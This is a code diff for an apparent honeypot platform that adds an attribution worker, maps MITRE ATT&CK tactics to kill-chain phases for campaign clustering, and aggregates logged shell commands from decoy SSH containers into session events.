+                "Walks attribution_state for identities flagged on >= 2 "
+                "primitives and emits attribution.profile.multi_actor_suspected."
+            ),
+        ),
+        daemon: bool = typer.Option(
+            False, "--daemon", "-d",
+            help="Detach to background as a daemon process",
+        ),
+    ) -> None:
+        """Attribution engine v0 — per-(identity, primitive) state machine.
+
+        Subscribes to ``attacker.observation.>`` and, for each event,
+        ensures a stub identity row, runs the merger over the full
+        per-(identity, primitive) observation series, upserts the
+        derived state, and publishes
+        ``attribution.profile.state_changed`` only on transition.
+        Periodic tick fires
+        ``attribution.profile.multi_actor_suspected`` when >= 2
+        primitives flag the same identity.
+
+        Closes DEBT-051. Bright-line scope: behavioural coherence and
+        drift only — never persona attribution to natural persons.
+        """
+        import asyncio
+        from decnet.correlation.attribution_worker import (
+            run_attribution_loop,
+        )
+        from decnet.web.dependencies import repo
+
+        if daemon:
+            log.info(
+                "attribution worker daemonizing tick=%s",
+                multi_actor_tick_secs,
+            )
+            _utils._daemonize()
+
+        log.info(
+            "attribution worker command invoked tick=%s",
+            multi_actor_tick_secs,
+        )
+        console.print(
+            f"[bold cyan]Attribution engine starting[/] "
+            f"multi_actor_tick={multi_actor_tick_secs}s"
+        )
+        console.print("[dim]Press Ctrl+C to stop[/]")
+
+        async def _run() -> None:
+            await repo.initialize()
+            await run_attribution_loop(
+                repo,
+                multi_actor_tick_secs=multi_actor_tick_secs,
+            )
+
+        try:
+            asyncio.run(_run())
+        except KeyboardInterrupt:
+            console.print("\n[yellow]Attribution engine stopped.[/]")
+
    @app.command(name="clusterer")
    def clusterer(
        poll_interval_secs: float = typer.Option(
@@ -295,3 +359,10 @@ def register(app: typer.Typer) -> None:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Campaign clusterer stopped.[/]")
+
+    # ``decnet ttp`` and ``decnet ttp-backfill`` moved to
+    # :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
+    # is colocated there, mirroring the per-feature CLI split used by
+    # :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
+    # ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
+    # ``decnet ttp`` because the command name is unchanged.
--- a/decnet/clustering/campaign/impl/connected_components.py
+++ b/decnet/clustering/campaign/impl/connected_components.py
@@ -66,7 +66,10 @@ def cluster_identities(
    return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}


-def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
+def from_identity_row(
+    row: dict[str, Any],
+    ttp_decky_phases: list[dict[str, Any]] | None = None,
+) -> IdentityFeatures:
    """Project an ``AttackerIdentity`` projection row dict into an
    :class:`IdentityFeatures`.

@@ -75,20 +78,59 @@ def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
    ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
    (JSON list[str] or null).

-    Phase-handoff fields stay empty until the production-row adapter
-    learns to mine logs for per-decky phase sequences (TODO.md
-    "production-side payload + C2 + commands joins"). Without those,
-    the campaign clusterer falls back to shared-infra + temporal
-    overlap + cohort signals on production data; the fixture path
-    exercises the full feature set via :func:`from_synthetic_identity`.
+    *ttp_decky_phases* is the optional per-identity payload from
+    :meth:`BaseRepository.list_ttp_decky_phases` — one row per
+    ``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
+    provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
+    populates :attr:`IdentityFeatures.first_phase_per_decky` /
+    ``last_phase_per_decky`` / ``first_seen_per_decky`` /
+    ``last_seen_per_decky`` so the production phase-handoff edge
+    finally fires. The synthetic fixture path
+    (:func:`from_synthetic_identity`) is unchanged — fixtures keep
+    emitting UKC directly.
    """
+    from decnet.clustering.ukc import tactic_to_ukc_phase  # noqa: PLC0415
+
    payload_hashes = _parse_json_list(row.get("payload_simhashes"))
    c2_endpoints = _parse_json_list(row.get("c2_endpoints"))

+    first_phase_per_decky: dict[str, str] = {}
+    last_phase_per_decky: dict[str, str] = {}
+    first_seen_per_decky: dict[str, float] = {}
+    last_seen_per_decky: dict[str, float] = {}
+    decky_set: set[str] = set()
+
+    # Rows arrive ordered by ``created_at``; ``setdefault`` keeps the
+    # FIRST observation per decky, plain assignment captures the LAST.
+    # Tags whose tactic is outside the ATT&CK→UKC map are dropped.
+    # Pre-target phases should never be assigned by a rule (TTP_TAGGING.md
+    # §UKC bridge); NOTE(review): a mapped one (TA0043) is not filtered.
+    for entry in ttp_decky_phases or []:
+        decky = entry.get("decky_id")
+        tactic = entry.get("tactic")
+        created_at_ts = entry.get("created_at_ts")
+        if not isinstance(decky, str) or not isinstance(tactic, str):
+            continue
+        phase = tactic_to_ukc_phase(tactic)
+        if phase is None:
+            continue
+        ts = float(created_at_ts) if isinstance(
+            created_at_ts, (int, float)) else 0.0
+        decky_set.add(decky)
+        first_phase_per_decky.setdefault(decky, phase.value)
+        last_phase_per_decky[decky] = phase.value
+        first_seen_per_decky.setdefault(decky, ts)
+        last_seen_per_decky[decky] = ts
+
    return IdentityFeatures(
        identity_uuid=row["uuid"],
        payload_hashes=frozenset(payload_hashes),
        c2_endpoints=frozenset(c2_endpoints),
+        decky_set=frozenset(decky_set),
+        first_phase_per_decky=first_phase_per_decky,
+        last_phase_per_decky=last_phase_per_decky,
+        first_seen_per_decky=first_seen_per_decky,
+        last_seen_per_decky=last_seen_per_decky,
    )


@@ -132,8 +174,26 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
        # merged out — their winner is the active row and gets clustered
        # on its own.  This keeps the campaign graph from double-counting.
        active_rows = [r for r in rows if not r.get("merged_into_uuid")]
+        # Pull TTP-derived per-decky phase observations per identity
+        # (E.3.15). Failures here are non-fatal — the clusterer falls
+        # back to the empty phase-handoff signal, same as the legacy
+        # behavior, so a partial repo doesn't take the worker down.
+        decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
+        for r in active_rows:
+            try:
+                decky_phases_by_identity[r["uuid"]] = (
+                    await repo.list_ttp_decky_phases(r["uuid"])
+                )
+            except Exception:  # noqa: BLE001
+                log.warning(
+                    "campaign clusterer: list_ttp_decky_phases failed "
+                    "for identity %s; phase-handoff edge inert",
+                    r["uuid"],
+                )
+                decky_phases_by_identity[r["uuid"]] = []
        feature_list: list[IdentityFeatures] = [
-            from_identity_row(r) for r in active_rows
+            from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
+            for r in active_rows
        ]
        row_by_uuid: dict[str, dict[str, Any]] = {
            r["uuid"]: r for r in active_rows
--- a/decnet/clustering/campaign/impl/similarity.py
+++ b/decnet/clustering/campaign/impl/similarity.py
@@ -342,7 +342,7 @@ def combined_campaign_weight(
 # ─── Adapter for synthetic-fixture tests ────────────────────────────────────


-def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:  # type: ignore[no-untyped-def]
+def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
    """Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.

    Treats one ``SyntheticAttacker`` as one identity — adequate for
--- a/decnet/clustering/campaign/worker.py
+++ b/decnet/clustering/campaign/worker.py
@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/clustering/impl/connected_components.py
+++ b/decnet/clustering/impl/connected_components.py
@@ -363,8 +363,9 @@ async def _roll_up_fingerprints(
    breaks the clusterer tick — the columns just stay stale until the
    next pass."""
    summaries = extract_fp_summaries(member_rows)
+    fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
    try:
-        await repo.update_identity_fingerprints(identity_uuid, **summaries)
+        await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
    except Exception:  # noqa: BLE001
        log.exception(
            "clusterer: failed to roll up fingerprints for identity=%s",
--- a/decnet/clustering/impl/similarity.py
+++ b/decnet/clustering/impl/similarity.py
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
 # ─── Adapter for the synthetic-corpus tests ─────────────────────────────────


-def from_synthetic(att) -> Observation:  # type: ignore[no-untyped-def]
+def from_synthetic(att) -> Observation:
    """Build an :class:`Observation` from a ``SyntheticAttacker``.

    Lives here so test code doesn't import the factory shape into the
--- a/decnet/clustering/ukc.py
+++ b/decnet/clustering/ukc.py
@@ -15,6 +15,7 @@ emits no events for unobservable phases.
 from __future__ import annotations

 from enum import Enum
+from typing import Final


 class UKCPhase(str, Enum):
@@ -106,3 +107,96 @@ def stage_of(phase: UKCPhase) -> str:
    if phase in STAGE_THROUGH:
        return "through"
    return "out"
+
+
+# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
+# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
+# A further ICS tactic needs an entry here AND in
+# _NON_ENTERPRISE_TACTICS below. See TTP_TAGGING.md "UKC bridge".
+ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
+    # Enterprise
+    "TA0043": UKCPhase.RECONNAISSANCE,        # Reconnaissance
+    "TA0042": UKCPhase.RESOURCE_DEVELOPMENT,  # Resource Development
+    "TA0001": UKCPhase.DELIVERY,              # Initial Access
+    "TA0002": UKCPhase.EXECUTION,             # Execution
+    "TA0003": UKCPhase.PERSISTENCE,           # Persistence
+    "TA0004": UKCPhase.PRIVILEGE_ESCALATION,  # Privilege Escalation
+    "TA0005": UKCPhase.DEFENSE_EVASION,       # Defense Evasion
+    "TA0006": UKCPhase.CREDENTIAL_ACCESS,     # Credential Access
+    "TA0007": UKCPhase.DISCOVERY,             # Discovery
+    "TA0008": UKCPhase.LATERAL_MOVEMENT,      # Lateral Movement
+    "TA0009": UKCPhase.COLLECTION,            # Collection
+    "TA0011": UKCPhase.COMMAND_AND_CONTROL,   # Command and Control
+    "TA0010": UKCPhase.EXFILTRATION,          # Exfiltration
+    "TA0040": UKCPhase.IMPACT,                # Impact
+    # ICS — first-class projection so MQTT / Conpot / Modbus tags
+    # don't drop out of campaign rollups when the clusterer projects
+    # tactic to phase. ICS uses an independent tactic-ID range.
+    "TA0100": UKCPhase.COLLECTION,            # ICS: Collection
+    "TA0102": UKCPhase.DISCOVERY,             # ICS: Discovery
+    "TA0105": UKCPhase.IMPACT,                # ICS: Impact
+    "TA0106": UKCPhase.IMPACT,                # ICS: Impair Process Control
+}
+
+
+# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
+# DECNET does not currently load. They're exempt from the
+# enterprise-bundle validation in :func:`validate_against_attack_bundle`
+# so a startup check doesn't false-fail the moment ICS rules are wired.
+_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
+    {"TA0100", "TA0102", "TA0105", "TA0106"}
+)
+
+
+def validate_against_attack_bundle() -> None:
+    """Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
+
+    Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
+    typoed tactic ID surfaces as a fail-closed boot, not a silent
+    miss in campaign rollups.
+    """
+    from decnet.ttp.attack_stix import assert_known_tactic_ids
+
+    assert_known_tactic_ids(
+        list(ATTACK_TACTIC_TO_UKC.keys()),
+        source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
+        exempt=set(_NON_ENTERPRISE_TACTICS),
+    )
+
+
+def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
+    """Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
+
+    Returns ``None`` for unknown tactics. The map is closed-over the
+    enterprise + ICS tactics referenced by the rule pack; a tactic
+    outside that set is a contributor bug, not a runtime miss.
+    """
+    return ATTACK_TACTIC_TO_UKC.get(tactic)
+
+
+# Inverse map, built once at import time. Several phases have more than
+# one tactic (e.g. both TA0009 and TA0100 map to COLLECTION); the
+# enterprise tactic wins because it is listed first in
+# ATTACK_TACTIC_TO_UKC. A dict comprehension keeps the LAST write per
+# key, so we iterate in reverse to keep the FIRST occurrence per phase.
+# Phases with no forward entry (e.g. WEAPONIZATION, SOCIAL_ENGINEERING)
+# are deliberately lossy on the inverse — TTP tags must never assign
+# them. NOTE(review): RECONNAISSANCE / RESOURCE_DEVELOPMENT do have
+# forward entries (TA0043 / TA0042), so they are NOT lossy as built —
+# confirm against OBSERVABLE_PHASES. See TTP_TAGGING.md §UKC bridge.
+_UKC_TO_TACTIC: dict[UKCPhase, str] = {
+    phase: tactic
+    for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
+}
+
+
+def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
+    """Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
+
+    Returns ``None`` for any phase absent from the inverse map. The
+    intent is that pre-target phases outside :data:`OBSERVABLE_PHASES`
+    are lossy. NOTE(review): the map is unfiltered, so ``RECONNAISSANCE``
+    (TA0043) resolves today; only unmapped phases (``WEAPONIZATION``)
+    return ``None``. The CDD test in E.2.9 pins which phases are lossy.
+    """
+    return _UKC_TO_TACTIC.get(phase)
--- a/decnet/clustering/worker.py
+++ b/decnet/clustering/worker.py
@@ -115,11 +115,11 @@ async def run_clusterer_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/collector/worker.py
+++ b/decnet/collector/worker.py
@@ -18,6 +18,7 @@ from datetime import datetime
 from pathlib import Path
 from typing import Any, Callable, Optional

+from decnet.artifacts.shards import find_shard_with_sid
 from decnet.bus import topics as _topics
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import (
@@ -75,6 +76,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
 )
 _RL_MAX_ENTRIES: int = 10_000

+# APP-NAMEs we never want to see in the ingestion stream — native unix
+# daemons that share a container with a DECNET service. Their logs are
+# noise: sshd's "Failed password for root from X" duplicates the
+# auth-helper's structured `auth_attempt` event, pam_unix repeats it
+# again, and CRON/systemd/etc. say nothing about attacker behavior.
+# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
+_DROP_APPS: frozenset[str] = frozenset(
+    a.strip()
+    for a in os.environ.get(
+        "DECNET_COLLECTOR_DROP_APPS",
+        "sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
+    ).split(",")
+    if a.strip()
+)
+
 _rl_lock: threading.Lock = threading.Lock()
 _rl_last: dict[tuple[str, str, str, str], float] = {}

@@ -82,10 +98,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
 def _should_ingest(parsed: dict[str, Any]) -> bool:
    """
    Return True if this parsed event should be written to the JSON ingestion
-    stream. Rate-limited connection-lifecycle events return False when another
-    event with the same (attacker_ip, decky, service, event_type) was emitted
-    inside the dedup window.
+    stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
+    rate-limits connection-lifecycle events within a dedup window.
    """
+    if parsed.get("service", "") in _DROP_APPS:
+        return False
    event_type = parsed.get("event_type", "")
    if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
        return True
@@ -116,6 +133,234 @@ def _reset_rate_limiter() -> None:
    with _rl_lock:
        _rl_last.clear()

+
+# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
+#
+# The TTP worker subscribes to ``attacker.session.ended`` and turns each
+# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
+# (see ``decnet/ttp/worker._build_events``). No upstream worker was
+# producing that topic — the rule pack therefore never fired on live
+# traffic. The aggregator below indexes shell-command events
+# per-attacker_ip and emits one ``attacker.session.ended`` envelope
+# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
+#
+# Memory bound: each attacker_ip's command list is pruned by TTL eviction
+# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
+
+_SESSION_AGG_TTL_SEC: float = _parse_float_env(
+    "DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
+)
+
+
+# Body of a bash PROMPT_COMMAND CMD line:
+#   ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
+# Splits into the structured fields the inspector renders + the
+# residual ``cmd=`` value (which may itself contain spaces — preserve
+# everything after ``cmd=`` as one token, do NOT word-split).
+_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
+
+
+def _parse_cmd_msg(msg: str) -> dict[str, str]:
+    """Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
+
+    Returns the empty dict on a non-CMD msg. ``command`` carries the
+    full post-``cmd=`` rest, including any embedded whitespace —
+    tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
+    everything after the first space.
+    """
+    if not msg.startswith("CMD "):
+        return {}
+    head, sep, cmd_rest = msg[4:].partition("cmd=")
+    out: dict[str, str] = {}
+    for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
+        out[k] = v
+    if sep:
+        out["command"] = cmd_rest
+    return out
+
+
+def _parse_iso_ts(value: str) -> Optional[datetime]:
+    """Best-effort ISO-8601 parse for parsed event timestamps.
+
+    The collector's parser stamps ``timestamp`` either as the original
+    ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
+    reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
+    ``fromisoformat`` after a space→T swap. Returns None if neither
+    shape parses — the aggregator skips events it can't time-stamp.
+    """
+    if not value:
+        return None
+    candidates = (value, value.replace(" ", "T"))
+    for cand in candidates:
+        try:
+            return datetime.fromisoformat(cand)
+        except ValueError:
+            continue
+    return None
+
+
+class _SessionAggregator:
+    """Per-attacker_ip command index that emits ``attacker.session.ended``.
+
+    Thread-safe — :meth:`add_event` is called from the per-container
+    stream threads. Internal state is protected by a single lock; the
+    publish fan-out happens inside the lock for simplicity (the
+    downstream publish_fn is the thread-safe marshaller from
+    :mod:`decnet.bus.publish`, which is non-blocking).
+    """
+
+    def __init__(
+        self,
+        publish_fn: Callable[[str, dict[str, Any], str], None],
+        *,
+        ttl_sec: float = _SESSION_AGG_TTL_SEC,
+    ) -> None:
+        self._publish = publish_fn
+        self._ttl = ttl_sec
+        self._lock = threading.Lock()
+        # attacker_ip → list of (timestamp, parsed_event) tuples.
+        # Stored as a list rather than a deque so the ``in_window``
+        # filter can index linearly; the per-attacker volume is
+        # bounded by the TTL and by typical session size (≤ a few
+        # hundred commands) so this stays cheap.
+        self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
+
+    def add_event(self, parsed: dict[str, Any]) -> None:
+        """Index a parsed event. Emits on ``session_recorded``."""
+        event_type = parsed.get("event_type", "")
+        attacker_ip = parsed.get("attacker_ip") or ""
+        if not attacker_ip or attacker_ip == "Unknown":
+            return
+        ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
+        if ts is None:
+            return
+        with self._lock:
+            self._evict_expired(ts)
+            if event_type == "command":
+                self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
+                return
+            if event_type == "session_recorded":
+                self._emit_session(parsed, attacker_ip, ts)
+
+    def _evict_expired(self, now: datetime) -> None:
+        """Drop commands older than ``self._ttl`` seconds."""
+        cutoff = now.timestamp() - self._ttl
+        for ip, entries in list(self._cmds.items()):
+            kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
+            if kept:
+                self._cmds[ip] = kept
+            else:
+                del self._cmds[ip]
+
+    def _emit_session(
+        self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
+    ) -> None:
+        """Build an ``attacker.session.ended`` envelope and publish it.
+
+        Selects from the per-IP list the commands whose timestamp is at
+        or after ``ended_at - duration_s`` (no upper bound is applied).
+        Commands stay in the list after selection — TTL eviction is the
+        only path that drops them, so two back-to-back sessions for the
+        same IP share the visible window without losing rows.
+        """
+        fields = parsed.get("fields", {}) or {}
+        duration_raw = fields.get("duration_s") or "0"
+        try:
+            duration_s = float(duration_raw)
+        except (TypeError, ValueError):
+            duration_s = 0.0
+        sid = str(fields.get("sid") or "")
+        service = str(fields.get("service") or parsed.get("service") or "")
+        decky = parsed.get("decky") or ""
+
+        commands_window = self._cmds.get(attacker_ip, [])
+        cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
+        commands: list[dict[str, Any]] = []
+        for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
+            if cmd_ts.timestamp() < cutoff_lo:
+                continue
+            cmd_fields = cmd_parsed.get("fields", {}) or {}
+            # Pull structured uid/user/src/pwd/command from the bash
+            # msg body. The inspector renders these as separate
+            # key/value rows, which is much friendlier than dumping
+            # the raw ``CMD uid=0 user=... cmd=...`` string into a
+            # single ``command_text`` blob.
+            parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
+            cmd_text = (
+                cmd_fields.get("command")
+                or cmd_fields.get("cmd")
+                or parsed_kv.get("command")
+                or cmd_parsed.get("msg", "")
+            )
+            entry: dict[str, Any] = {
+                "id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
+                "command_text": str(cmd_text),
+                "ts": cmd_ts.isoformat(),
+                "decky": cmd_parsed.get("decky", ""),
+                "service": cmd_parsed.get("service", ""),
+            }
+            for key in ("uid", "user", "src", "pwd"):
+                value = parsed_kv.get(key) or cmd_fields.get(key)
+                if value is not None:
+                    entry[key] = value
+            commands.append(entry)
+
+        # Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
+        # session-ended handler in the profiler worker) don't each have to
+        # disk-reach independently. Shard fields can be malformed or the
+        # transcripts dir may not exist yet — find_shard_with_sid returns
+        # None in those cases and we publish ``shard_path: None`` so the
+        # consumer skips honestly. Additive field; existing TTP consumers
+        # ignore it.
+        shard_path: str | None = None
+        resolve_error: str | None = None
+        if sid and decky and service:
+            try:
+                resolved = find_shard_with_sid(decky, service, sid)
+            except (ValueError, OSError, PermissionError) as exc:
+                resolve_error = f"{type(exc).__name__}: {exc}"
+                resolved = None
+            if resolved is not None:
+                shard_path = str(resolved)
+        if shard_path is None and sid:
+            # Loud-by-default — the BEHAVE-SHELL handler will skip
+            # session.ended events with shard_path=None, so a silent
+            # miss here means the profiler panel never hydrates. Surface
+            # the most common failure modes inline so the operator can
+            # diagnose without grepping decnet/artifacts/shards.py.
+            #
+            # 1. ARTIFACTS_ROOT not readable by the collector's user
+            #    (perm 0750 decnet:decnet vs. User=anti without
+            #    SupplementaryGroups=decnet).
+            # 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
+            # 3. sessrec hasn't flushed the shard for this sid yet
+            #    (collector tick won the race; next tick recovers).
+            logger.warning(
+                "collector: shard_path=None decky=%s service=%s sid=%s "
+                "(error=%s) — profiler will skip this session.ended; "
+                "check ARTIFACTS_ROOT perms / service whitelist",
+                decky, service, sid, resolve_error or "shard not found",
+            )
+
+        payload: dict[str, Any] = {
+            "session_id": sid or None,
+            "attacker_uuid": None,  # consumer resolves via repo
+            "attacker_ip": attacker_ip,
+            "decky_id": decky,
+            "service": service,
+            "ended_at": ended_at.isoformat(),
+            "duration_s": duration_s,
+            "commands": commands,
+            "shard_path": shard_path,
+        }
+        topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
+        try:
+            self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
+        except Exception as exc:  # noqa: BLE001
+            logger.debug(
+                "collector: session.ended publish failed: %s", exc,
+            )
+
 # ─── RFC 5424 parser ──────────────────────────────────────────────────────────

 _RFC5424_RE = re.compile(
@@ -129,6 +374,27 @@ _RFC5424_RE = re.compile(
    r"(\S+) "       # 4: MSGID (event_type)
    r"(.+)$",       # 5: SD element + optional MSG
 )
+
+# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
+# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
+# That inner RFC 5424 line lands on the container's stdout, where the
+# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
+# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
+# sees ``event_type == "-"`` while the real MSGID (``command``) is
+# inside the body. We detect that case and re-extract the inner
+# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
+# ``event_type == "command"`` plus the real source hostname.
+#
+# Anchored on an ISO-8601 timestamp at the head of the body so we
+# don't false-match free-form prose like "Connection from 1.2.3.4".
+_INNER_RFC5424_RE = re.compile(
+    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
+    r"(\S+)\s+"                       # 2: inner HOSTNAME
+    r"(\S+)\s+"                       # 3: inner APP-NAME
+    r"\S+\s+"                         # PROCID (NIL or PID)
+    r"(\S+)\s+"                       # 4: inner MSGID
+    r"(.+)$",                         # 5: inner SD/MSG remainder
+)
 _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
 _PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
 _IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
@@ -168,8 +434,23 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
    ts_raw, decky, service, event_type, sd_rest = m.groups()

    fields: dict[str, str] = {}
-    msg: str = ""

+    # Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
+    # stdout envelope around the inner ``logger --msgid command`` line).
+    # Outer MSGID is NIL; the real MSGID is inside the body. Detect
+    # the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
+    # remainder so downstream extraction sees the real header.
+    if event_type == "-" and sd_rest.startswith("-"):
+        body = sd_rest[1:].lstrip()
+        inner = _INNER_RFC5424_RE.match(body)
+        if inner is not None:
+            _i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
+            decky = i_host
+            service = i_app
+            event_type = i_msgid
+            sd_rest = i_rest
+
+    msg: str = ""
    if sd_rest.startswith("-"):
        msg = sd_rest[1:].lstrip()
    elif sd_rest.startswith("["):
@@ -177,16 +458,28 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
        if block:
            for k, v in _PARAM_RE.findall(block.group(1)):
                fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
-            msg_match = re.search(r'\]\s+(.+)$', sd_rest)
-            if msg_match:
-                msg = msg_match.group(1).strip()
+        # Always recover the post-SD message tail, even when the SD
+        # block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
+        # syslog auto-emits on bash CMD lines). Without this the body
+        # of unwrapped PROMPT_COMMAND lines stays empty and the
+        # attacker_ip kv-fallback below has nothing to scan.
+        msg_match = re.search(r'\]\s+(.+)$', sd_rest)
+        if msg_match:
+            msg = msg_match.group(1).strip()
    else:
        msg = sd_rest

    attacker_ip = "Unknown"
    for fname in _IP_FIELDS:
        if fname in fields:
-            attacker_ip = fields[fname]
+            raw = fields[fname]
+            # Split "host:port" / "[v6]:port" only; a bare IPv6 literal (e.g. 2001:db8::1) stays whole.
+            host, _, port = raw.rpartition(":")
+            if host and port.isdigit() and (":" not in host or host.endswith("]")):
+                attacker_ip = host.strip("[]")  # handle [::1]:port IPv6 form
+                fields.setdefault("remote_port", port)
+            else:
+                attacker_ip = raw
            break

    # Fallback for plain `logger` callers that don't use SD params (notably
@@ -220,6 +513,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
    except ValueError:
        ts_formatted = ts_raw

+    # Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
+    # "CMD ") get event_type rewritten to "command". `fields` stays empty
+    # so the frontend's msg-based pill rendering doesn't double up.
+    if event_type == "-" and msg.startswith("CMD "):
+        event_type = "command"
+
    return {
        "timestamp": ts_formatted,
        "decky": decky,
@@ -346,7 +645,7 @@ def _stream_container(
    publish_fn: CollectorPublishFn | None = None,
 ) -> None:
    """Stream logs from one container and append to the host log files."""
-    import docker  # type: ignore[import]
+    import docker

    lf: Optional[Any] = None
    jf: Optional[Any] = None
@@ -416,12 +715,17 @@ def _make_system_log_publisher(
    thread can call it unconditionally.  Otherwise each call is marshalled
    onto *loop* (the asyncio event loop that owns the bus socket) via
    ``make_thread_safe_publisher``.
+
+    The same call also feeds a :class:`_SessionAggregator` so shell
+    commands are indexed per-attacker_ip and ``attacker.session.ended``
+    fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
    """
    raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
    if raw_publish is None:
        return lambda _parsed: None

    topic = _topics.system(_topics.SYSTEM_LOG)
+    aggregator = _SessionAggregator(raw_publish)

    def _publish(parsed: dict[str, Any]) -> None:
        event_type = parsed.get("event_type", "")
@@ -436,6 +740,7 @@ def _make_system_log_publisher(
            },
            event_type,
        )
+        aggregator.add_event(parsed)

    return _publish

@@ -450,7 +755,7 @@ async def log_collector_worker(log_file: str) -> None:

    Watches Docker events to pick up containers started after initial scan.
    """
-    import docker  # type: ignore[import]
+    import docker

    log_path = Path(log_file)
    json_path = log_path.with_suffix(".json")
--- a/decnet/config_ini.py
+++ b/decnet/config_ini.py
@@ -39,6 +39,7 @@ Shape::
    master-host = 10.0.0.1        # required on agents
    syslog-port = 6514
    swarmctl-port = 8770
+    swarmctl-host = 127.0.0.1     # bind address for `decnet swarmctl`

    [logging]
